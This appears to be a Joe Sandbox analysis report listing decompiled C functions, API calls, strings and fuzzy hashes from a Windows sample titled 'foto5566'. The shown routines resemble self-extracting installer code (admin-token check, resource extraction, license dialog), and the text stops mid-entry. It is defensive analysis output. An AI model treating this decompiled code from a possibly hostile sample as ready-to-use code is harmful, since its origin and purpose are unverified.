				_t14 =  *0x938004; // 0x911e09f9
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x93a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00936CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x009317f6
0x009317fd
0x00931805
0x0093180b
0x0093180d
0x00931815
0x00931818
0x00931820
0x00931824
0x0093182c
0x00931832
0x00931837
0x00931851
0x00931854
0x0093185d
0x00931862
0x0093186c
0x00931872
0x00931877
0x0093187e
0x0093187e
0x00931883
0x00931883
0x0093185d
0x0093188a
0x0093188a
0x009318a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,009318DD), ref: 0093181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0093182C
AllocateAndInitializeSid.ADVAPI32(009318DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,009318DD), ref: 00931855
FreeSid.ADVAPI32(?,?,?,?,009318DD), ref: 00931883
FreeLibrary.KERNEL32(00000000,?,?,?,009318DD), ref: 0093188A

Strings

CheckTokenMembership, xrefs: 00931826
advapi32.dll, xrefs: 00931810

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: 2e1245a968cc409a243d13e8b756014f325fcbb777c2cad70cfc3c35c9ca60d2
Instruction ID: 16df2f030a5efe984598c36c3695aea1af5dfb48f2c48e47eb3e6d2d1157c014
Opcode Fuzzy Hash: 2e1245a968cc409a243d13e8b756014f325fcbb777c2cad70cfc3c35c9ca60d2
Instruction Fuzzy Hash: 3611B271E14209AFDB149FA5DC49ABFBBB8EF49701F10016AFA41E32A0DB308D019F95

Uniqueness

Uniqueness Score: -1.00%

Function 00933450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00933450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E009343D0(_t24, _t12);
					SetWindowTextA(_t24, "foto5566");
					SetDlgItemTextA(_t24, 0x838,  *0x939404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x9391dc = 1;
					goto L8;
				}
				return 0;
			}

0x00933459
0x0093345c
0x009334d8
0x009334de
0x00000000
0x009334e0
0x0093345e
0x00933463
0x0093349a
0x009334a0
0x009334a7
0x009334b2
0x009334c4
0x009334cb
0x00000000
0x009334cb
0x00933468
0x0093346e
0x00933474
0x00000000
0x00000000
0x0093347c
0x0093348c
0x00933490
0x00000000
0x00933496
0x00933484
0x00000000
0x00000000
0x00933486
0x00000000
0x00933486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 00933490
GetDesktopWindow.USER32 ref: 0093349A
SetWindowTextA.USER32(?,foto5566), ref: 009334B2
SetDlgItemTextA.USER32(?,00000838), ref: 009334C4
SetForegroundWindow.USER32(?), ref: 009334CB
EndDialog.USER32(?,00000002), ref: 009334D8

Strings

foto5566, xrefs: 009334AC

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: foto5566
API String ID: 852535152-645582358
Opcode ID: 72ce52558a5dd18f7acbb796465cbc4256a0eadd4f39fd3258c374494c06eb85
Instruction ID: 7ace8bf4102869a84848519ea2b0a55588dd399622d7803ecc4286d5dc542911
Opcode Fuzzy Hash: 72ce52558a5dd18f7acbb796465cbc4256a0eadd4f39fd3258c374494c06eb85
Instruction Fuzzy Hash: 8801F7312EC114ABC7165FA5DC0C96E7B69EB45700F00C410F987965B1CB759F41EF81

Uniqueness

Uniqueness Score: -1.00%

Function 00932AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00932AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x938004; // 0x911e09f9
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x939a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00931680(_t65, E009317C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E009365E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00931680(_t65, E009317C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00936CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x00932aac
0x00932ab7
0x00932abc
0x00932abe
0x00932ac3
0x00932ac6
0x00932ac9
0x00932ace
0x00932ae6
0x00932bdc
0x00932bdc
0x00932be0
0x00000000
0x00000000
0x00932af2
0x00932afc
0x00932b00
0x00932b05
0x00932b05
0x00932b0b
0x00932bca
0x00932bd1
0x00932b11
0x00932b18
0x00932b26
0x00932b99
0x00932bc8
0x00000000
0x00000000
0x00932b9b
0x00932bae
0x00932bb3
0x00932bb5
0x00932bb5
0x00932bb8
0x00932bb8
0x00932bba
0x00932bbb
0x00000000
0x00932bb8
0x00932b28
0x00932b2e
0x00932b33
0x00932b39
0x00932b3c
0x00932b3c
0x00932b3e
0x00932b3f
0x00932b55
0x00932b5d
0x00932b64
0x00932b64
0x00932b7a
0x00932b7f
0x00932b81
0x00932b81
0x00932b84
0x00932b84
0x00932b86
0x00932b87
0x00932bbf
0x00932bc1
0x00932bc1
0x00932b26
0x00932bda
0x00932bda
0x00932be6
0x00932be6
0x00932bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00932AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 00932AF2
CharNextA.USER32(?), ref: 00932B12
CharUpperA.USER32 ref: 00932B1E
CharPrevA.USER32(?,?), ref: 00932B55
CharNextA.USER32(?), ref: 00932BD4

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: 0e0c72d5c8215385685ea0f15716ecaae5d5895185afbdadd88f3a6e050c4257
Instruction ID: 10df7c0fb9fea3c7ee1882b35a494eb6769661ff4ec11e19c13d7f5208e6d341
Opcode Fuzzy Hash: 0e0c72d5c8215385685ea0f15716ecaae5d5895185afbdadd88f3a6e050c4257
Instruction Fuzzy Hash: F94115346082859FDB159F349C54AFDBBBD9F97300F1440AAE8C287212DB358E86DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 009343D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E009343D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x938004; // 0x911e09f9
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00936CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x009343d0
0x009343d8
0x009343df
0x009343e6
0x009343ec
0x009343f1
0x00934400
0x00934403
0x0093440b
0x00934420
0x00934429
0x00934437
0x00934444
0x00934447
0x0093444d
0x00934454
0x0093445b
0x00934460
0x00934461
0x00934467
0x0093446f
0x00934473
0x00934473
0x00934463
0x00934463
0x00934463
0x0093447a
0x00934481
0x00934484
0x0093448a
0x00934492
0x00934496
0x00934496
0x00934486
0x00934486
0x00934486
0x009344b8

APIs

GetWindowRect.USER32(?,?), ref: 009343F1
GetWindowRect.USER32(00000000,?), ref: 0093440B
GetDC.USER32(?), ref: 00934423
GetDeviceCaps.GDI32(00000000,00000008), ref: 0093442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0093443A
ReleaseDC.USER32(?,00000000), ref: 00934447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001,?), ref: 009344A2

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: 0a7df29ec4fe029ffd0386a8485ed6abe42f80755030b2d355b6f043d5859073
Instruction ID: baf02745a7a78e7dc35ce771a7f75ec87416d0273571920497bb128f26eaa8f4
Opcode Fuzzy Hash: 0a7df29ec4fe029ffd0386a8485ed6abe42f80755030b2d355b6f043d5859073
Instruction Fuzzy Hash: 93314932E14119AFCB14CFF8DD889EEBBBAEB89310F154169F805B3250DA34AD059F60

Uniqueness

Uniqueness Score: -1.00%

Function 00936298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00936298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x938004; // 0x911e09f9
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E0093171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x939124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x93a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E0093171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00936CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x00936298
0x009362a0
0x009362a7
0x009362ad
0x009362af
0x009362bb
0x009362c3
0x009362c4
0x0093633b
0x0093633b
0x00936345
0x0093634d
0x00000000
0x00000000
0x009362da
0x009362de
0x0093635f
0x00936369
0x009362e0
0x009362e0
0x009362e0
0x009362e3
0x009362e5
0x009362e5
0x009362e8
0x009362e8
0x009362ea
0x009362eb
0x009362ef
0x009362f1
0x009362f3
0x00936302
0x00936308
0x0093630d
0x00936314
0x00936314
0x00936316
0x00936319
0x00936355
0x00936357
0x0093631b
0x0093631b
0x00936331
0x00936334
0x00936339
0x00000000
0x00936339
0x00936319
0x0093636b
0x0093637d
0x0093637d
0x00000000

APIs

Part of subcall function 0093171E: _vsnprintf.MSVCRT ref: 00931750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,009351CA,00000004,00000024,00932F71,?,00000002,00000000), ref: 009362CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,009351CA,00000004,00000024,00932F71,?,00000002,00000000), ref: 009362D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,009351CA,00000004,00000024,00932F71,?,00000002,00000000), ref: 0093631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00936345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,009351CA,00000004,00000024,00932F71,?,00000002,00000000), ref: 00936357

Strings

UPDFILE%lu, xrefs: 009362B3, 00936329

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 8c48087fb210eaaa1a597144b8b73d6add9e74cb34c3225459fea3d2196b0c2e
Instruction ID: c5921d1fd6a8f14d82fab13e59af4b26d051b33ca8c3c6c53a12c69f7820747d
Opcode Fuzzy Hash: 8c48087fb210eaaa1a597144b8b73d6add9e74cb34c3225459fea3d2196b0c2e
Instruction Fuzzy Hash: E1212171A04219ABCB14AFA48C459FFBB7CEF88714F004129FA42A3200DB798D029FE0

Uniqueness

Uniqueness Score: -1.00%

Function 0093681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0093681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x938004; // 0x911e09f9
				_v8 = _t19 ^ _t44;
				_t41 =  *0x9381d8; // 0xfffffffe
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x9381d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x9381d8; // 0xfffffffe
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x931140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E009366F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x9381d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E00936CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}

0x0093681f
0x0093682a
0x00936831
0x00936836
0x0093683c
0x0093683e
0x00936848
0x00936851
0x0093685d
0x00936864
0x00936876
0x0093693a
0x0093693a
0x0093687c
0x0093687e
0x00936885
0x00000000
0x009368d6
0x009368f4
0x00936900
0x00936902
0x0093690a
0x00000000
0x0093690c
0x0093690c
0x0093691c
0x00000000
0x0093691e
0x00936924
0x0093692b
0x00936932
0x00000000
0x00000000
0x00000000
0x0093692b
0x0093691c
0x0093690a
0x00936885
0x00936876
0x00936951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0093686E
GetSystemMetrics.USER32(0000004A), ref: 009368A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 009368CC
RegQueryValueExA.ADVAPI32(?,00931140,00000000,?,?,0000000C), ref: 009368F4
RegCloseKey.ADVAPI32(?), ref: 00936902

Part of subcall function 009366F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0093691A), ref: 00936741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 009368C2

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1109908249
Opcode ID: a474220b00cd055a394b5af61c09d0bafde179b1fb3f864d7780cc2c3333f71d
Instruction ID: 5e530fa6fd2ba5a2e6fb20d22e7d1d58058e53eb53d68a4338fd00c5dec0872e
Opcode Fuzzy Hash: a474220b00cd055a394b5af61c09d0bafde179b1fb3f864d7780cc2c3333f71d
Instruction Fuzzy Hash: 6C31C131A04318EFDB31CB51CC45BABB7BCEB41728F1041A9E94DA2150DBB09E89CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00933A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00933A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E0093468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x938d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0093468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x938d4c, "<None>") == 0) {
							LocalFree( *0x938d4c);
							L9:
							 *0x939124 = 0;
							return 1;
						}
						_t9 = E00936517(_t19, 0x7d1, 0, E00933100, 0, 0);
						LocalFree( *0x938d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x939124 = 0x800704c7;
						L2:
						return 0;
					}
					E009344B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x938d4c);
					 *0x939124 = 0x80070714;
					goto L2;
				}
				E009344B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x939124 = E00936285();
				goto L2;
			}

0x00933a46
0x00933a57
0x00933a5d
0x00933a63
0x00933a6a
0x00933a91
0x00933a9a
0x00933ad8
0x00933b13
0x00933b19
0x00933b1b
0x00000000
0x00933b21
0x00933ae7
0x00933af4
0x00933afc
0x00000000
0x00000000
0x00933afe
0x00933a87
0x00000000
0x00933a87
0x00933aa8
0x00933ab3
0x00933ab9
0x00000000
0x00933ab9
0x00933a78
0x00933a82
0x00000000

APIs

Part of subcall function 0093468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009346A0
Part of subcall function 0093468F: SizeofResource.KERNEL32(00000000,00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346A9
Part of subcall function 0093468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009346C3
Part of subcall function 0093468F: LoadResource.KERNEL32(00000000,00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346CC
Part of subcall function 0093468F: LockResource.KERNEL32(00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346D3
Part of subcall function 0093468F: memcpy_s.MSVCRT ref: 009346E5
Part of subcall function 0093468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009346EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00932F64,?,00000002,00000000), ref: 00933A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00933AB3

Part of subcall function 009344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00934518
Part of subcall function 009344B9: MessageBoxA.USER32(?,?,foto5566,00010010), ref: 00934554

Part of subcall function 00936285: GetLastError.KERNEL32(00935BBC), ref: 00936285

lstrcmpA.KERNEL32(<None>,00000000), ref: 00933AD0
LocalFree.KERNEL32 ref: 00933B13

Part of subcall function 00936517: FindResourceA.KERNEL32(00930000,000007D6,00000005), ref: 0093652A
Part of subcall function 00936517: LoadResource.KERNEL32(00930000,00000000,?,?,00932EE8,00000000,009319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00936538
Part of subcall function 00936517: DialogBoxIndirectParamA.USER32(00930000,00000000,00000547,009319E0,00000000), ref: 00936557
Part of subcall function 00936517: FreeResource.KERNEL32(00000000,?,?,00932EE8,00000000,009319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00936560

LocalFree.KERNEL32(00000000,00933100,00000000,00000000), ref: 00933AF4

Strings

LICENSE, xrefs: 00933A46
<None>, xrefs: 00933AC5

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: 1a794dfdab9fbfc46ab1e80e2a0992239ff5c1436d44d12acf0ee34315fdd439
Instruction ID: 94eac12b2df32831ed2631d47045e20e345ef80600fb16bf43216af863a170b5
Opcode Fuzzy Hash: 1a794dfdab9fbfc46ab1e80e2a0992239ff5c1436d44d12acf0ee34315fdd439
Instruction Fuzzy Hash: 0D11B430258201ABD724AF72AC09F2779FDDBD5700F10852EB581E61F0DE798C00AE21

Uniqueness

Uniqueness Score: -1.00%

Function 009324E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E009324E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x938004; // 0x911e09f9
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E0093658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00936CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x009324e0
0x009324eb
0x009324f2
0x009324f7
0x00932504
0x0093250e
0x0093251d
0x0093252c
0x00932541
0x00932546
0x00932553
0x00932555
0x00932555
0x00932546
0x0093256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00932506
